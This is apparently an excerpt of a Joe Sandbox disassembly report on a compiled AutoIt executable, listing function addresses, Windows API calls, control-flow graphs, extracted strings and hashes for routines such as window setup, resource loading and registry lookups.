                                                          • Part of subcall function 000C39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C3A03
                                                          • Part of subcall function 000C39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3A24
                                                          • Part of subcall function 000C39D5: ShowWindow.USER32(00000000,?,?), ref: 000C3A38
                                                          • Part of subcall function 000C39D5: ShowWindow.USER32(00000000,?,?), ref: 000C3A41
                                                          • Part of subcall function 000C434A: _memset.LIBCMT ref: 000C4370
                                                          • Part of subcall function 000C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C4415
                                                        Strings
                                                        • This is a third-party compiled AutoIt script., xrefs: 000FD279
                                                        • runas, xrefs: 000FD33A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 529118366-3287110873
                                                        • Opcode ID: 98e5bc7903fc108bb1b0d35b18757e526e0d23419462d1f7f81fbbdf9f5718ea
                                                        • Instruction ID: ea54349a187d843006bf0bbc2a6368dfa2e59e3e5665066a46bde82dc3b2ac2c
                                                        • Opcode Fuzzy Hash: 98e5bc7903fc108bb1b0d35b18757e526e0d23419462d1f7f81fbbdf9f5718ea
                                                        • Instruction Fuzzy Hash: 5951B034908208EACB11EBB4DC46FFD7BBAEB55750F00806DF415A22A3CB705786DB21
                                                        Function 000C49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 996 c49a0-c4a00 call c7667 GetVersionExW call c7bcc 1001 c4b0b-c4b0d 996->1001 1002 c4a06 996->1002 1003 fd767-fd773 1001->1003 1004 c4a09-c4a0e 1002->1004 1005 fd774-fd778 1003->1005 1006 c4a14 1004->1006 1007 c4b12-c4b13 1004->1007 1009 fd77b-fd787 1005->1009 1010 fd77a 1005->1010 1008 c4a15-c4a4c call c7d2c call c7726 1006->1008 1007->1008 1018 fd864-fd867 1008->1018 1019 c4a52-c4a53 1008->1019 1009->1005 1012 fd789-fd78e 1009->1012 1010->1009 1012->1004 1014 fd794-fd79b 1012->1014 1014->1003 1016 fd79d 1014->1016 1020 fd7a2-fd7a5 1016->1020 1021 fd869 1018->1021 1022 fd880-fd884 1018->1022 1019->1020 1023 c4a59-c4a64 1019->1023 1024 fd7ab-fd7c9 1020->1024 1025 c4a93-c4aaa GetCurrentProcess IsWow64Process 1020->1025 1026 fd86c 1021->1026 1030 fd86f-fd878 1022->1030 1031 fd886-fd88f 1022->1031 1027 fd7ea-fd7f0 1023->1027 1028 c4a6a-c4a6c 1023->1028 1024->1025 1029 fd7cf-fd7d5 1024->1029 1032 c4aac 1025->1032 1033 c4aaf-c4ac0 1025->1033 1026->1030 1038 fd7fa-fd800 1027->1038 1039 fd7f2-fd7f5 1027->1039 1034 fd805-fd811 1028->1034 1035 c4a72-c4a75 1028->1035 1036 fd7df-fd7e5 1029->1036 1037 fd7d7-fd7da 1029->1037 1030->1022 1031->1026 1040 fd891-fd894 1031->1040 1032->1033 1041 c4b2b-c4b35 GetSystemInfo 1033->1041 1042 c4ac2-c4ad2 call c4b37 1033->1042 1046 fd81b-fd821 1034->1046 1047 fd813-fd816 1034->1047 1043 c4a7b-c4a8a 1035->1043 1044 fd831-fd834 1035->1044 1036->1025 1037->1025 1038->1025 1039->1025 1040->1030 1045 c4af8-c4b08 1041->1045 1053 c4b1f-c4b29 GetSystemInfo 1042->1053 1054 c4ad4-c4ae1 call c4b37 1042->1054 1051 fd826-fd82c 1043->1051 1052 c4a90 1043->1052 1044->1025 1050 fd83a-fd84f 1044->1050 1046->1025 1047->1025 1055 fd859-fd85f 1050->1055 1056 fd851-fd854 1050->1056 1051->1025 1052->1025 1058 c4ae9-c4aed 1053->1058 1061 c4b18-c4b1d 1054->1061 1062 c4ae3-c4ae7 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1058->1045 1060 c4aef-c4af2 FreeLibrary 1058->1060 1060->1045 1061->1062 1062->1058
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 000C49CD
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • GetCurrentProcess.KERNEL32(?,0014FAEC,00000000,00000000,?), ref: 000C4A9A
                                                        • IsWow64Process.KERNEL32(00000000), ref: 000C4AA1
                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 000C4AE7
                                                        • FreeLibrary.KERNEL32(00000000), ref: 000C4AF2
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 000C4B23
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 000C4B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: b0a770766da2c79ef2c3121390bb464331dd10696258c1ca50cc034aae6e1b6c
                                                        • Instruction ID: c3e1a69b72ec237d190700457e44772904ba45375124a32d103af381cd2bb8e3
                                                        • Opcode Fuzzy Hash: b0a770766da2c79ef2c3121390bb464331dd10696258c1ca50cc034aae6e1b6c
                                                        • Instruction Fuzzy Hash: 4D91C63198D7C4DEC771DB688460AAEBFF5BF3A300B48495ED0CB93A41D620E948D75A
                                                        Function 000C4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1063 c4e89-c4ea1 CreateStreamOnHGlobal 1064 c4ec1-c4ec6 1063->1064 1065 c4ea3-c4eba FindResourceExW 1063->1065 1066 fd933-fd942 LoadResource 1065->1066 1067 c4ec0 1065->1067 1066->1067 1068 fd948-fd956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 fd95c-fd967 LockResource 1068->1069 1069->1067 1070 fd96d-fd98b 1069->1070 1070->1067
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000C4D8E,?,?,00000000,00000000), ref: 000C4E99
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000C4D8E,?,?,00000000,00000000), ref: 000C4EB0
                                                        • LoadResource.KERNEL32(?,00000000,?,?,000C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,000C4E2F), ref: 000FD937
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,000C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,000C4E2F), ref: 000FD94C
                                                        • LockResource.KERNEL32(000C4D8E,?,?,000C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,000C4E2F,00000000), ref: 000FD95F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: e5bcc279ea97054e45e8a3488aa8b0ac724ac6aadec3c4cf4dabad12688bb718
                                                        • Instruction ID: 9a7ca5c713e8224f7ad152cd1444afd6c8ca269bb51851c29ff98e5c8038f272
                                                        • Opcode Fuzzy Hash: e5bcc279ea97054e45e8a3488aa8b0ac724ac6aadec3c4cf4dabad12688bb718
                                                        • Instruction Fuzzy Hash: 6B115E75240701BFD7218B65EC98F6B7BBAFBC5B11F20426CF50586660DBA1E8418660
                                                        Function 000CFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: 856fd8a804b9196fe2d308818544b8d4194a188ce51a1a2a774bd2a1ef78d9f2
                                                        • Instruction ID: 9cb7e386eb0b7df317da2c4b6424b1c5bd678185419551afa70e92c9c7e96584
                                                        • Opcode Fuzzy Hash: 856fd8a804b9196fe2d308818544b8d4194a188ce51a1a2a774bd2a1ef78d9f2
                                                        • Instruction Fuzzy Hash: 00926B746083419FD720DF14C480B6ABBE5BF89304F14896EE98A9B362D771EC45CBA2
                                                        Function 0012445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,000FE398), ref: 0012446A
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0012447B
                                                        • FindClose.KERNEL32(00000000), ref: 0012448B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 740e586f659655cb957f8fddf7d2b9a49a0243c3b490a179f6f648b92e4229e9
                                                        • Instruction ID: 0cf3d334226096b2c3c249473f196be035b95b84012b54658c4823f108f96002
                                                        • Opcode Fuzzy Hash: 740e586f659655cb957f8fddf7d2b9a49a0243c3b490a179f6f648b92e4229e9
                                                        • Instruction Fuzzy Hash: 5BE0D87A4109506B52107B38FC0D8EA775C9F06335F10071AF935C11E0E7B499509595
                                                        Function 000CE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Variable must be of type 'Object'., xrefs: 00103E62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Variable must be of type 'Object'.
                                                        • API String ID: 0-109567571
                                                        • Opcode ID: 918191e0bfa6fccae9b68a9d20ed079505de614c635ee01b46efc5ca7be08ff8
                                                        • Instruction ID: f96001180fb89ece9a0abf178c0b66148ac671dd6ebad114cf5d178f93f84d7a
                                                        • Opcode Fuzzy Hash: 918191e0bfa6fccae9b68a9d20ed079505de614c635ee01b46efc5ca7be08ff8
                                                        • Instruction Fuzzy Hash: DCA26875A00245CFCB24CF58C480FAEB7B6FB58310F28816DE956AB391D775AD82CB91
                                                        Function 000D09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000D0A5B
                                                        • timeGetTime.WINMM ref: 000D0D16
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000D0E53
                                                        • Sleep.KERNEL32(0000000A), ref: 000D0E61
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 000D0EFA
                                                        • DestroyWindow.USER32 ref: 000D0F06
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000D0F20
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00104E83
                                                        • TranslateMessage.USER32(?), ref: 00105C60
                                                        • DispatchMessageW.USER32(?), ref: 00105C6E
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00105C82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 4212290369-3242690629
                                                        • Opcode ID: c2703f0948580489dba77841391d02fa4869c6941685da2dfeb3817a742a36c7
                                                        • Instruction ID: 404ca454510c48daeddfd85f94d39e74dc9c78524cdc755231b5fc55c9f2ebe8
                                                        • Opcode Fuzzy Hash: c2703f0948580489dba77841391d02fa4869c6941685da2dfeb3817a742a36c7
                                                        • Instruction Fuzzy Hash: A2B29E70608741DFD728DF24C884BAFB7E6BF85304F14491EE589972A2DBB5E884CB52
                                                        Function 00129155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00128F5F: __time64.LIBCMT ref: 00128F69
                                                          • Part of subcall function 000C4EE5: _fseek.LIBCMT ref: 000C4EFD
                                                        • __wsplitpath.LIBCMT ref: 00129234
                                                          • Part of subcall function 000E40FB: __wsplitpath_helper.LIBCMT ref: 000E413B
                                                        • _wcscpy.LIBCMT ref: 00129247
                                                        • _wcscat.LIBCMT ref: 0012925A
                                                        • __wsplitpath.LIBCMT ref: 0012927F
                                                        • _wcscat.LIBCMT ref: 00129295
                                                        • _wcscat.LIBCMT ref: 001292A8
                                                          • Part of subcall function 00128FA5: _memmove.LIBCMT ref: 00128FDE
                                                          • Part of subcall function 00128FA5: _memmove.LIBCMT ref: 00128FED
                                                        • _wcscmp.LIBCMT ref: 001291EF
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129824
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129837
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00129452
                                                        • _wcsncpy.LIBCMT ref: 001294C5
                                                        • DeleteFileW.KERNEL32(?,?), ref: 001294FB
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00129511
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00129522
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00129534
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 7559c021af637dd87973d1f907417ac11c5a9ed32f2a9665140f3f01d7be52b1
                                                        • Instruction ID: 4f397ca4c5290db351c013c3131a90337098bd03a5636dc18339798cac3de09e
                                                        • Opcode Fuzzy Hash: 7559c021af637dd87973d1f907417ac11c5a9ed32f2a9665140f3f01d7be52b1
                                                        • Instruction Fuzzy Hash: 2AC16EB1D00229AEDF11DFA5DC81EDEBBBCEF55310F0040AAF609E6152DB309A958F61
                                                        Function 000C3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 000C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 000C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 000C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 000C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 244b66933b1c6af08f376e8387802731a3650007f9caaba7f8f15c6e1715481a
                                                        • Instruction ID: e68074a1229920f7a14db9ccabb674aa7c5ba27c43b8df59635879e094773f49
                                                        • Opcode Fuzzy Hash: 244b66933b1c6af08f376e8387802731a3650007f9caaba7f8f15c6e1715481a
                                                        • Instruction Fuzzy Hash: 2A313875841309EFDB10CFA4D889A9EBBF5FB0A310F10416EF580A66A0D7B50681CF91
                                                        Function 000C3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 000C3074
                                                        • RegisterClassExW.USER32(00000030), ref: 000C309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C30AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 000C30CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C30DC
                                                        • LoadIconW.USER32(000000A9), ref: 000C30F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 49b31bcf374f58f0976e1505a6cdfa1f4e0a91c1f0f766a672702699ae2f2761
                                                        • Instruction ID: d273d5d17bad30936d2ebdbb64e1fb030a8dce339811186e409c3afdda3a5308
                                                        • Opcode Fuzzy Hash: 49b31bcf374f58f0976e1505a6cdfa1f4e0a91c1f0f766a672702699ae2f2761
                                                        • Instruction Fuzzy Hash: E121E5B9940208EFDB00DFA5E849B9DBBF6FB0A701F00412AF510A67A0D7B546858F91
                                                        Function 000C708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001852F8,?,000C37AE,?), ref: 000C4724
                                                          • Part of subcall function 000E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000C7165), ref: 000E052D
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C71A8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000FE8C8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000FE909
                                                        • RegCloseKey.ADVAPI32(?), ref: 000FE947
                                                        • _wcscat.LIBCMT ref: 000FE9A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: 81b4c42e7b22f45f631432018e2335e0827fe319f00e63a90bf45127c9154100
                                                        • Instruction ID: a7e3bec86fbc6a530fe20b7b52f1c62f6cc9a8d16969cdabaad608bb19cc14b2
                                                        • Opcode Fuzzy Hash: 81b4c42e7b22f45f631432018e2335e0827fe319f00e63a90bf45127c9154100
                                                        • Instruction Fuzzy Hash: 507169711083019EC304EF65EC41AAFBBE9FF85350F40492EF545976B2DB719A89CB62
                                                        Function 000C3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 000C3A50
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 000C3A5F
                                                        • LoadIconW.USER32(00000063), ref: 000C3A76
                                                        • LoadIconW.USER32(000000A4), ref: 000C3A88
                                                        • LoadIconW.USER32(000000A2), ref: 000C3A9A
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C3AC0
                                                        • RegisterClassExW.USER32(?), ref: 000C3B16
                                                          • Part of subcall function 000C3041: GetSysColorBrush.USER32(0000000F), ref: 000C3074
                                                          • Part of subcall function 000C3041: RegisterClassExW.USER32(00000030), ref: 000C309E
                                                          • Part of subcall function 000C3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C30AF
                                                          • Part of subcall function 000C3041: InitCommonControlsEx.COMCTL32(?), ref: 000C30CC
                                                          • Part of subcall function 000C3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C30DC
                                                          • Part of subcall function 000C3041: LoadIconW.USER32(000000A9), ref: 000C30F2
                                                          • Part of subcall function 000C3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C3101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
